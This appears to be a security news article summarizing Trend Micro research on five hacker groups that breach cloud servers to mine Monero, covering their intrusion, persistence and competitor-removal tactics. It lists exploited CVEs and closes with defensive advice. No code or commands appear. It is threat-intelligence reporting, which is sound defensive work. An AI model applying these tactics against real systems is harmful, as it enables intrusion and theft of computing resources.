Cryptomining at Someone Else’s Expense: How Hacker Groups Breach Cloud Services

The “gold rush” era of cryptocurrency is long over, and cybercriminals have adapted accordingly. Today, mining cryptocurrency with malware is only profitable at a very large scale, so virus writers are constantly looking for ways to expand their operations and increase profits. Trend Micro conducted a study on the activities of such groups and shared their preliminary findings.

Why Are Cryptominers Dangerous?

Mining cryptocurrency is much less profitable than stealing confidential information or spreading ransomware. As a result, cybercriminals now target cloud services rather than end-user machines. The most popular cryptocurrency among attackers is Monero (XMR), as it offers the highest returns when mined using CPUs, which is important since most cloud services do not provide access to GPUs. This makes the regular processor the only available mining tool.

Hacker groups actively compete with each other for resources, and security experts compare this battle to Capture the Flag cyber tournaments. In their research, Trend Micro analyzed the activities of the most active groups attacking cloud services: Outlaw, TeamTNT, Kinsing, 8220, and Kek Security.

Migrating infrastructure to the cloud is a clear trend in recent years, as it allows companies to save significantly on hardware and maintenance. However, deploying cloud services requires investment in configuration and administration, especially to ensure security. Many companies cut corners here. While many system administrators are familiar with tools for protecting local infrastructure, such as firewalls and antivirus software, they often lack the knowledge and experience needed for cloud services. If monitoring and logging tools are not properly set up in the cloud, administrators may not receive the same level of information as they do with local systems, making it easier to miss an attack. The result is often a breach, and using a compromised cloud for cryptomining is sometimes the least of the possible problems.

Since many cloud services have standardized configurations and default settings that are well-documented and not secret, attackers don’t need to spend much effort on reconnaissance or use sophisticated tools. While it may seem that a cryptominer Trojan in a cloud system is not a serious threat since it doesn’t cause data leaks or infrastructure damage, it can slow down services, cause customer dissatisfaction and churn, and ultimately reduce profits. If a system is vulnerable, attackers can also exploit it for more destructive purposes.

For research purposes, Trend Micro specialists installed the Monero mining program XMRig on a test cloud server that was also running other tasks. They observed CPU usage rising from 13% to 100%. In monetary terms, this increased the server’s monthly rental cost from $20 to $130. Network traffic also increased, but these costs were minor compared to the overall expenses.

Often, access to a compromised cloud server is put up for sale by attackers, and a miner is uploaded temporarily while waiting for a buyer. Detecting such a Trojan is a very bad sign—it’s often the last chance to address security issues before hackers use the compromised server for more malicious purposes.

Hacking Techniques and Hacker Groups

Typically, cybercriminals gain access to cloud infrastructure via SSH by exploiting default settings, known vulnerabilities, or easily guessed passwords through brute force. They then install XMRig, which connects to a mining pool.

Outlaw

Trend Micro began tracking the Outlaw group in November 2018. The group’s name comes from the English translation of their main tool’s Romanian name, “haiduc.” Initially, Outlaw specialized in hacking IoT devices and Linux servers using known vulnerabilities and SSH brute force. After a breach, they would install the haiduc IRC bot, created with Perl Shellbot, to remotely control the compromised system. The device or server could then be used for Monero mining or DDoS attacks.

Over time, Outlaw’s toolkit has changed little, mainly because cloud security technologies have evolved slowly compared to Windows servers and hosts. Since 2019, Outlaw has started installing scripts on compromised systems to remove miners from competing hacker groups and even earlier versions of their own malware. The group’s command server IP address has changed several times, with the latest in use since 2021, indicating the stability of this criminal business.

The IRC bot used by Outlaw is partly based on the source code of another Perl Shellbot, Kippo, which was used by the Romanian hacker group TEAMUL MaLaSorTe in 2013. Whether Outlaw is connected to TEAMUL MaLaSorTe or simply borrowed their malware code remains unclear.

TeamTNT

TeamTNT came to the attention of cybersecurity experts in 2020. After successfully breaching a server, TeamTNT hackers attempt to steal credentials to compromise other services and expand their reach. They are particularly interested in AWS clouds, from which they steal keys and Ngrok tokens. TeamTNT is also active on social media, with members like Hilde and Hildegard running Twitter accounts where they comment on research into their attacks and clarify which incidents are not related to their group.

TeamTNT often targets servers and hosts previously compromised by competitors, especially the Kinsing group. After infiltrating a system, they leave not only miners but also messages for administrators, offering to help fix the vulnerabilities that led to the breach.

Researchers believe that despite this “Robin Hood” approach, TeamTNT is more dangerous than other groups because they don’t just install miners—they also try to compromise all services running under the hacked account (databases, websites, cloud applications) and sometimes block legitimate user accounts. They have also been observed installing rootkits to hide miners in infected systems. Although TeamTNT announced they were ceasing operations, security experts doubt the truth of this claim.

Kinsing

Kinsing has been active since 2021. After gaining access to a cloud server, Kinsing hackers install the XMRig miner, remove malware from other groups, and add a cron job to download and install a shell script for system control. This activity was easy to identify through cron logs, as the hackers either didn’t know how to cover their tracks or didn’t care.

Recently, Kinsing changed tactics. They combined previously used shell scripts into one, with a dynamically generated name. Malicious cron jobs can now be launched from different directories with different filenames. Kinsing also learned to clean up after themselves, deleting traces of malware installation from logs. They use an up-to-date set of exploits, regularly updated to stay current. Trend Micro noted several incidents where 8220 hackers broke into a host already compromised by Kinsing, but Kinsing quickly removed their competitors’ miners without interrupting their own mining process.

8220

This group has been especially active over the past year, using the latest cloud service vulnerabilities. One of their main targets is Oracle WebLogic Server. 8220 hackers exploit vulnerable WebLogic servers, then deploy XMRig and Tsunami (a Trojan for scanning and DDoS attacks). To maintain persistence, they set up cron jobs.

Researchers note that 8220 and Kinsing are in fierce competition for vulnerable servers, removing each other’s malware from compromised systems. Unlike TeamTNT, 8220 and Kinsing are not active on underground forums or social media, possibly because they prefer to stay under the radar.

Kek Security

In January 2021, Imperva researchers published a report on a new botnet using a Python-based IRC bot called Necro. This bot is similar to Outlaw’s haiduc and can be used for cryptomining and DDoS attacks. The group behind Necro is Kek Security, which quickly integrates new exploits and constantly updates its malware.

In addition to cloud services and Linux servers, Kek Security also attacks Windows hosts, thanks to their extensive arsenal. Their toolkit includes exploits for:

• CVE-2020-14882: RCE vulnerability in Oracle WebLogic Server
• CVE-2020-28188: TerraMaster TOS RCE
• CVE-2021-3007: Zend Framework RCE
• CVE-2020-7961: RCE via JSON Web Services for Liferay Portal
• CVE-2021-21972: RCE for VMware vCenter Server
• CVE-2021-29003: RCE in Genexis Platinum 4410 2.1 P4410-V2-1.28

A comment in the Python code of an early version of Kek Security’s bot allowed researchers to identify the likely author’s pseudonym, previously linked to other malware, including IoT Trojans. The author later began creating and launching their own botnets.

Kek Security’s software is continuously updated and improved. Recent versions of their bot are obfuscated using a custom Python obfuscator.

Cloud Battles

The near-total lack of proper protection on vulnerable cloud servers, combined with the fact that attacking groups use almost the same set of exploits, leads to fierce competition. The “cloud battles” between 8220 and Kinsing are just one example. Almost all the hacker groups mentioned use scripts to remove competitors’ software from compromised servers. In effect, these scripts act as primitive antivirus tools.

To counter these scripts, attackers often change the folders and process names used to launch miners. However, over time, “antivirus” scripts are updated, and this advantage is lost. Sometimes the same group acts as both attacker and defender. Kinsing has developed the most advanced protection algorithms: they run the miner in memory, delete their configuration files, and generate six-character file names, with files located in different directories. As a result, when 8220 hackers re-infect a host, they can’t find and remove the Kinsing miner, but Kinsing’s script can successfully remove 8220’s software after the next update.

While these two groups battle it out, Outlaw avoids them, targeting other systems but also using tools to remove competing miners. Kek Security also has such tools but rarely engages in direct confrontation. TeamTNT, on the other hand, not only removes other hackers’ software but also offers services to secure compromised systems against vulnerabilities, sometimes reaching out to other groups via Twitter.

Conclusion

The most active miner-spreading groups in 2021 were Kinsing and 8220, though the others are also active.

To protect against such attacks, information security experts recommend, first, installing all current software updates promptly, and second, ensuring that only necessary services are running on cloud servers. Most vulnerabilities exploited by hacker groups are found in outdated software, so timely updates can close these security gaps. However, even with all updates installed, attackers can exploit poorly configured services (such as Docker and Kubernetes)—a vector used by TeamTNT. API interfaces should not be accessible from the internet, as this allows attackers to control services. Instead, access should be restricted to administrators and a few users.

Finally, do not leave services running with default settings. It is recommended to use firewalls, intrusion detection and prevention systems (IDS/IPS), and endpoint security products in cloud infrastructure to restrict and filter network traffic. If possible, block domains associated with known mining pools—lists of which are easy to find online.